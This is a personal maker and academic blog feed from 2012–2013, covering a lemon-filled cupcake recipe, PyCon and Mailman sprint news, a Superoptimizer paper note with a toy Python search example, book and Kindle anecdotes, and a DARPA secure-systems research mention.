This is crossposted from Curiousity.ca, my personal maker blog. If you want to link to this post, please use the original link since the formatting there is usually better.

I helpfully told my friend Adric that these cupcakes were my way of doing human testing without requiring IRB approval. Remember kiddies, experimental cupcakes are only one step away from mad science because my guinea pigs generally consent to the experiment!



Figure 1: Lemon Googe Cupcake without icing. Note the “clever” use of bad filter in attempt to disguise poor quality cell phone photo, as per cultural norms in a post-instagram world



Lemon Googe Cupcakes


These come in three parts; some assembly required. I made up the recipe as a whole based on my recollection and modification of recipes in my head / recipe card box, with some inspiration from the filled cupcakes in Vegan Cupcakes Take Over the World (although this is not a vegan recipe).


Lemon Cupcake


1/4 C (4 tbsp) butter

3/4 C sugar (1/2C is probably ok for this recipe if you want to cut back)

1 egg

1 tsp vanilla

Zest from one lemon

1/2 C milk


1 tsp baking powder

1 C flour


Cream butter and sugar together; add egg, vanilla, lemon zest and milk and stir well.

Add baking powder and flour and stir until smooth (but no longer).

Spoon into cupcake liners (or I use silicone molds), filling about halfway.

We made 16 cupcakes, you might want to fill a bit higher to get 12.


Bake at 350F for 20-25 minutes (10-15 min for mini cupcakes)


Lemon Googe Filling


The name comes via my Ottawa friends: for some reason we decided that “googe” best described the texture of those little gel cup sweets that are considered to be a choking hazard in the US. This nomenclature would probably have died out, but one of my friends was severely grossed out by the word, so we have used it to describe anything of a given gooey texture ever since.


You’ll note that this is more or less a lemon pie filling recipe, omitting the egg, or a slightly gooey lemon pudding.


1/4 C cornstarch

1/2 C cold water


1 C hot water (Or less if you want thicker googe)

Juice from one lemon

3/4 C icing sugar (or adjust this to taste)


~3 drops of yellow food colouring


Mix together cornstarch and cold water, then add mixture to hot water along with lemon juice and sugar and stir well. Heat in microwave repeatedly (around 30-45s per time), stirring after each heating, until mixture is thick and no taste of cornstarch remains. You can probably nuke it longer between stirrings, but if it boils once it’s thicker it might splatter all over your microwave, so keep an eye on it. Add food colouring, because normal lemon pie filling gets its colour from egg yolk and you want people to immediately think “lemon” and not “what the heck?” as they might have if you had allowed your lovely assistant to use the blue colouring like he wanted.


If you are making mini cupcakes or just don’t plan to lose as much to taste-testing for the sugar, you can probably halve the googe recipe. Or you can allow people to dip the cupcakes in the remaining googe like some sort of weird fondue; I don’t judge.


You can add sugar after the fact if you think it needs more — it’ll dissolve, and no one minds getting a blob of icing sugar. You can’t do this with the cornstarch, though.



Figure 2: A metric ton of lemon googe, prior to colouring. (Well, ok, it’s 400ml rounded up.) This may be an excessive amount of googe for a single batch of cupcakes; see experimental notes below.



Cream Cheese Icing


4 oz regular cream cheese (half a package usually. Don’t use the spreadable stuff.)

1/4 C butter

1 tsp vanilla

Around 2 C icing sugar (or however much it takes until the consistency is correct)


I suspect you’re supposed to plan ahead for this and soften the butter and cream cheese in advance, but what I do is nuke those suckers together ’till they’re practically liquid and easy to stir (around 1 min), then add vanilla and sugar ’till it’s a slightly goopy icing consistency, and let it firm up as it cools. This strategy actually does make it easier to deal with the final icing in this case, since it’s easier to spread when a bit more liquid-y, but your mileage may vary.


You could probably put some lemon in here too, but at this point that seems like overkill.


Assembly instructions


Get an icing bag with a metal or plastic tip (sorry, this is one time that cutting the corner off a plastic bag probably isn’t enough). We’ll be using this to fill the cupcakes with lemon googe.


I chose a slightly too big tip, so my googe was spilling everywhere, and the lazy “I’m not sticking my hand in there to get a new tip because our kitchen sink broke this morning” solution was:


1. Stab the icing tip into the cupcake.

2. Spoon a tablespoon or so of googe into the bag.

3. Squeeze the googe into the cupcake, trying not to go right through to the bottom

Repeat, doing step 1 more quickly on subsequent cupcakes because you are dripping sticky slime all over the counter.


Yeay!


I had my lovely assistant do this part so it wasn’t bad for me at all, but you might want to save yourself the trouble and not use the largest icing tip you have on hand.



Figure 3: Lubricated lemon cupcakes. I’m pretty sure this moniker is not going to impress the friend who hates the word googe, but it’s more alliterative so it can be the alternate recipe name. Note the tools in the background include googe, an icing bag, and a place to put the icing bag so it doesn’t googe all over the counter.



You now have a cupcake with a gooey hole in it. I will refrain from juvenile jokes, but this may be the point where you’ll be really glad you used the food colouring so your lovely assistant will not think of juvenile jokes.


Cover your googe-filled cupcakes with cream cheese icing. This will be challenging because you’re basically holding a lubricated cupcake and the icing will slide off the hole in the center. Having experimented with this, I can tell you that it is easiest to ice the outside and then cover the googe last. It’s also fun to slime the top of the cupcake and layer the icing on that, which will add extra lemony goodness but is also really messy.



Figure 4: Lemon googe cupcakes, partially and fully prepared



The Lemon Googe Cupcake Experiments


Hypothesis: lemon googe, if inserted into the cupcake 24h+ in advance, will suffuse the cupcake making it more delicious.


Method:

16 cupcakes were created in the initial batch.

2 were assembled and eaten immediately and declared delicious by both experimental subjects J and T.


The remaining cupcakes have been divided into two groups. One has been filled with googe and iced and placed in the fridge to age for 24h. After the time has elapsed, two prepared cupcakes will be removed from refrigeration and eaten by experimental subjects J and T. If they are deemed an improvement over the freshly assembled cupcakes, the rest of the batch will be prepared in a similar manner. After 48h have passed, experimental subjects will be able to compare 0-day cupcakes, 24h cupcakes, and 48h cupcakes. If the prepared cupcakes are deemed unsuitable at 24h (likely due to structural integrity failures), then the control batch will be left untouched until shortly before the 2600 meeting which will represent our larger clinical cupcake trial. This will not be a double-blinded experiment, although one could be conducted at a later date to more comprehensively test cupcake saturation over time.


Hypothesis 2: 400ml is way too much googe


Method: 400ml of googe solution has been prepared and will be inserted into cupcakes as described above. If the cupcakes cannot hold this amount of googe, the remainder will be given to the experimental subjects for consumption or further experimentation. We will report back on crowdsourced solutions for too much googe after the clinical trials are complete.


Cupcake Clinical Trial


If you wish to participate in this clinical cupcake trial, please attend the 2600 meeting at Quelab on Friday April 5, 2013. Please note that I have not obtained ethics approval for this experiment and you will be participating at your own risk.

terriko: (Default)
2013-03-25 23:31
Entry tags:

Back from Pycon!

I should write up a proper trip report with pictures and stuff, but as it's nearly midnight and I don't want my sleeping patterns to stay on California time, you get some short highlights:

1. The conference itself was awesome. Recall: I attended the sprints last year but not the main conference, so while I had high hopes I didn't know that the content would be so good. I attended a lot of great talks and no doubt missed quite a few as well. I'll be making heavy use of the conference recordings over the next little while, I expect.

2. I am really excited about my free raspberry pi. While I know lots of folk who frequently get given cool toys and told to go hack them, this is the first time someone has gifted me with such an item/mission, and it feels great. I haven't figured out what I'm going to do yet, but there was this great talk about hooking one up to a $300 CNC machine, and another great one about home automation that could be useful...

3. The sprints were super-productive! You can see our todo/completed/waiting list here if you want the nitty gritty. I'd been joking earlier to anyone who asked that we were totally going to release by Friday, and while we didn't do that, we *are* very close and you should all expect a beta release of postorius + Mailman 3 very soon. I can't wait to show it off!

4. Perhaps later I'll do up the stats on exactly what I was doing to our repository, but I should tell you that not only did I make plenty of my own code commits, but I also got to merge code from new contributors. This was totally my favourite part, seeing new folk get their code accepted and in the main tree. And it wasn't just the people who were physically at the sprints with us: I also merged code from people contributing remotely, most of whom are prospective GSoC students. Way to impress me, students!

5. I got to talk to a bunch of people about GSoC. I do this all the time by email, but it was especially fun to talk to folk in person about what's involved, why it's awesome, how to be good at it, and why they should sign up.

6. And post-con, I got a few days to catch up with friends in the area and visit the Japanese Tea Garden in Golden Gate Park, which I've wanted to do ever since I read Seanan McGuire's October Daye books. As I processed a few photos for this week's assignment, you get one here:

1/400s of meditation in a tea garden

And with that, midnight has rung and it's bedtime. I have a long week of catch-up ahead of me at work, but expect some more pycon / mailman / gsoc posts out of me over the next little while as I internalize all the things I've been thinking about this past week.
terriko: (Pi)
2013-03-13 11:31
Entry tags:

PyCon PyCon PyCon PyCon

I'm not leaving yet, but it's just becoming increasingly hard to think about anything else. Which is really unfortunate, because my deal to myself was that I'd work this week (which is spring break at UNM) in exchange for taking next week off for hacking.

So, uh, yeah, back to work now. :)
terriko: (Default)
2013-03-01 00:59
Entry tags:

My awesomely nerdy life

It's been a while since I just wrote about what I'm doing, so let me tell you about some of this week:

Cory Doctorow (Speaking in Albuquerque, NM)

On Wednesday I...

... continued to run cool experiments on mutated software at work.
... went to see Cory Doctorow speak at the library.
... went out for falafel with some local hacklab folk.
... beat up an ingress portal with the help of my lvl 8 friend.

Today was less cool, what with the 2hr taxes-for-aliens session (not actually what they call it, but accurate enough), but I did make some coffee cupcakes with cream cheese icing.

Coffee cupcake with cream cheese icing



I plan to feed those to my coworkers (partially to make fun of the fact that we ran out of coffee today. "Look, I brought coffee!") and anyone who shows up at the local 2600 meeting tomorrow.

Then, on Saturday I'm going to build stilts and hopefully learn to walk on them! Or more likely, bruise my knees a lot, but hey, can never learn if I don't try, right?

And on Sunday I'm playing a concert of predominantly Percy Grainger music (which is pretty music-nerdy), and then hopefully taking part in a meeting to start a local Hacker Scouts guild.

So yeah, I've mostly been living life rather than photographing it and posting about it lately, but it is a very awesome life and you should all be jealous, promise!
terriko: (Pi)
2013-01-22 16:24
Entry tags:

Academic Notes: Superoptimizer -- A Look at the Smallest Program

Ages ago, I thought it would be a brilliant idea to write up stuff on the papers I read, much like I do book reviews, but then I promptly... didn't do it. But it's a new year with new papers, and here's the first for this year's seminar.

small toad
Photo: small toad by Scott* (Because tiny toads are adorable and compiler paper notes don't lend themselves to obvious illustration)

Superoptimizer -- A Look at the Smallest Program
Henry Massalin
1987

This is a neat little paper about optimizing assembly code. They took a program and then had the computer try to generate the smallest possible functionally equivalent version by exhaustively enumerating short instruction sequences. The paper is super short and readable and filled with lots of very clever adding of registers and stuff to avoid program jumps and comparisons. They could get it to optimize only fairly small programs (12 lines of assembly), but it still seemed like a lot of these would be useful compiler optimizations and they're probably in use now.

Anyhow, it's three pages of explanation + two pages of cool examples they found, so if you're looking for a fun little bit of computing to read about to fill out some mind-expanding new year's resolution, this is an easy place to start.

Some questions we had in seminar that I don't know the answers to:

- What was the impact of this paper on modern compilers?
- Do we do any of this while compiling, or make use of the things they found in a preset kind of way?
- Has anyone tried to do this using modern computers / other assembly instruction sets?
- It seemed like there was a lot of adding... would it be possible to make reduced assembly instruction sets on the assumption that they will never be programmed by humans and thus can be super-optimal?
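To make the paper's search concrete, here is an added toy superoptimizer (my own illustration, not Massalin's code or his 68000 instruction set): it enumerates every straight-line program over a tiny 8-bit two-register ISA, screens candidates on a few probe inputs the way the paper does, and returns the shortest one that computes the target on all 256 inputs. The ISA, the registers r0/r1, and the target (two's-complement absolute value) are my assumptions.

```python
"""Toy superoptimizer in the spirit of Massalin (1987).  Added example,
not code from the paper; the instruction set below is invented."""
import itertools

MASK = 0xFF  # all arithmetic is 8-bit, two's complement

def _sar7(v):
    """Arithmetic shift right by 7: 0 for non-negative, 0xFF (-1) for negative."""
    return 0xFF if v & 0x80 else 0

# Assumed toy ISA: two registers, r0 holds the input and the result,
# r1 is scratch and starts at 0.  Each op maps (rd, rs) -> new rd.
OPS = {
    "mov": lambda d, s: s,
    "add": lambda d, s: (d + s) & MASK,
    "sub": lambda d, s: (d - s) & MASK,
    "xor": lambda d, s: d ^ s,
    "neg": lambda d, s: (-d) & MASK,
    "sar": lambda d, s: _sar7(d),
}
TWO_OPERAND = {"mov", "add", "sub", "xor"}

# Every legal instruction as (opcode, rd, rs); rs is ignored by one-operand ops.
INSTRS = [(op, rd, rs) for op in OPS for rd in (0, 1)
          for rs in ((0, 1) if op in TWO_OPERAND else (rd,))]
# "mov rd, rd" is a no-op, so drop it and save the search some work.
INSTRS = [i for i in INSTRS if not (i[0] == "mov" and i[1] == i[2])]

def run(program, x):
    """Execute a program on input x (0..255) and return r0."""
    regs = [x & MASK, 0]
    for op, rd, rs in program:
        regs[rd] = OPS[op](regs[rd], regs[rs])
    return regs[0]

def superoptimize(target, max_len, probes=(1, 0xFF, 0x80, 0x7F)):
    """Return the shortest program of length <= max_len with
    run(p, x) == target(x) for every x in 0..255, or None.
    Shorter lengths are tried first, so the first hit is minimal.
    Cheap probe inputs reject almost every candidate before the
    full 256-input verification runs (the paper's probabilistic test)."""
    for length in range(1, max_len + 1):
        for program in itertools.product(INSTRS, repeat=length):
            if all(run(program, p) == target(p) for p in probes) and \
               all(run(program, x) == target(x) for x in range(256)):
                return list(program)
    return None

def abs8(x):
    """Target function: 8-bit two's-complement |x| (abs(-128) wraps to -128)."""
    return (-x if x & 0x80 else x) & MASK

if __name__ == "__main__":
    # Finds a 4-instruction branch-free |x| in a second or two.
    print(superoptimize(abs8, 4))
```

The search rediscovers the classic branch-free trick (copy, arithmetic shift to get the sign mask, xor, subtract) without anyone telling it about sign masks, which is exactly the kind of surprising sequence the paper's examples section is full of.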
terriko: I am a serious academic (Twlight Sparkle looking confused) (Serious Academic)
2013-01-21 15:16
Entry tags:

Book review: Under Wraps

I haven't been keeping up with my book reviews here although I do add them to LibraryThing and should probably just write myself an export script so it's easier for me. But whatever, that's not done yet, and I finished a book this afternoon while I was waiting for my experiment to run, so here it is.


Under Wraps (The Underworld Detection Agency Chronicles)
by Hannah Jayne

I liked the characters and the world of this funny urban fantasy, but they seemed almost out of sync with the murder that Sophie is supposed to be solving: the serial murder case seemed to take a back seat to the banter and internal monologuing of our somewhat hapless heroine. If you're looking for serious urban fantasy give this a miss, but it's fun in a first season Buffy sort of way. I'm not sure if it really grabbed me enough to read the next one, but who knows, maybe it'll grow into something more as the series expands?
terriko: Evil Soup (evil soup)
2013-01-16 12:58

Winter Driving

Winter Driving

I spent 3 weeks up in Ottawa, and the one thing I was looking forward to was not having to do any more serious winter driving.

Guess what it was like here on Monday?

On the bright side, I'm glad people drive super carefully around here when they're uncertain. But it's very hard not to laugh when we're inching down the road over a light dusting of snow. Good thing I wasn't in a hurry!
terriko: (Default)
2012-12-27 00:13
Entry tags:

Happy Holidays!

Looking at my twitter feed, it seems I spent my holiday with my grandmother's dog, so here's a picture:

2012-12-26 12.25.55

I've been having a lovely time with my parents and Buster the dog, all of whom like long walks in the local woods. My fitbit tells me their standard afternoon walk is just shy of 3 miles, which is still more meaningful to my not entirely metric parents than it is to me, but I'm slowly learning distances in imperial from living in the US. I spent the first few days in self-quarantine since John had finally infected me with the cold/flu he caught on the way back from St. Lucia, but to be honest all I did was sneeze on a TSA agent or two, have one miserable night when I arrived and then my immune system squashed it. Yeay immune systems! So I spent a few quiet reading and walking days that I probably didn't have to do to avoid being a disease vector, but it was lovely to read and walk and enjoy the local trails.

2012-12-24 12.02.55

The next few days will be a bit more chaotic as I try to meet up with people while I'm in town. If you want to get on the list, let me know! My old Canadian cell # is active if you want to get in touch, and I'll be in town till the 7th minus a few days at New Year's as usual.

Out for a walk in the woods
terriko: I am a serious academic (Twlight Sparkle looking confused) (Serious Academic)
2012-12-14 11:47
Entry tags:

Kindle Fire, take 3

You may recall that my Kindle Fire decided to stop charging right before I went off on my vacation at the beginning of December, and I had a somewhat terrible experience with Amazon's online customer service but they did in the end replace it under warranty.

I've had the replacement for two weeks, and it was acting a bit weird, rebooting while I was doing things like reading pdfs. So last night, I looked up whether this was a common problem and the suggestion seemed to be to hard reboot it, so I did.

The kindle has been stuck at the kindle fire reboot screen for about 12 hours now.

Since the online chat support was awful last time, I called Amazon this time and the phone support lady was very nice, efficient and very apologetic about not being able to get me a new device until Jan 4th. But the replacement is in the works, I just won't get it till after I get back from Ottawa.

Meanwhile, dead kindle #2 won't boot up and also won't shut down, so I may be sticking a running device in the mail, which feels kind of weird. Not much for it, though, since the thing is utterly unresponsive. Maybe it'll run out of battery before I get out to mail it this afternoon.
terriko: I am a serious academic (Twlight Sparkle looking confused) (Serious Academic)
2012-11-28 15:45
Entry tags:

RFC Poetry

A friend of mine wrote a twitter bot that spits out random bits of RFCs, somewhat inspired by horse_ebooks, and I suggested it would be nice if it wrote haiku, so now it does. It's not very good at it, but I found this almost poem in the feed:


Townson makes it has
the switch functions
02 Elgamal public key


And now I really want to write a haiku including the words "elgamal public key" -- pity "exchange" doesn't fit that into a 7-syllable line.

Some of the more intentional poetry it's written:


to authenticate the
already done our paper we have
home address found


It's almost poignant. Or Yoda crossed with Glinda the good witch, whatever.
terriko: (Default)
2012-11-20 11:05
Entry tags:

On what I do

You may have seen this article on Peter G. Neumann: Killing the Computer to Save It. It was making the rounds a few weeks ago. (Note that you can read NYT articles without logging in if you turn on temporary cookies and then click the link.)

In case you were curious or maybe thought some of that sounded familiar, that is indeed the same DARPA grant that drew me to the US for this postdoc. I'm on CRASH or "Clean-Slate Design of Resilient Adaptive Secure Hosts." The article has a short mention of the stuff we're doing:

Clean Slate is financing research to explore how to design computer systems that are less vulnerable to computer intruders and recover more readily once security is breached.

Dr. Shrobe argues that because the industry is now in a fundamental transition from desktop to mobile systems, it is a good time to completely rethink computing. But among the biggest challenges is the monoculture of the computer “ecosystem” of desktop, servers and networks, he said.

“Nature abhors monocultures, and that’s exactly what we have in the computer world today,” said Dr. Shrobe. “Eighty percent are running the same operating system.”

Lessons From Biology

To combat uniformity in software, designers are now pursuing a variety of approaches that make computer system resources moving targets. Already some computer operating systems scramble internal addresses much the way a magician might perform the trick of hiding a pea in a shell. The Clean Slate project is taking that idea further, essentially creating software that constantly shape-shifts to elude would-be attackers.

That the Internet enables almost any computer in the world to connect directly to any other makes it possible for an attacker who identifies a single vulnerability to almost instantly compromise a vast number of systems.

But borrowing from another science, Dr. Neumann notes that biological systems have multiple immune systems — not only are there initial barriers, but a second system consisting of sentinels like T cells has the ability to detect and eliminate intruders and then remember them to provide protection in the future.

In contrast, today’s computer and network systems were largely designed with security as an afterthought, if at all.


That barely touches on all the cool stuff we're doing, since the article isn't exactly about our work at UNM & UVA, but it was pretty neat to see it in the news.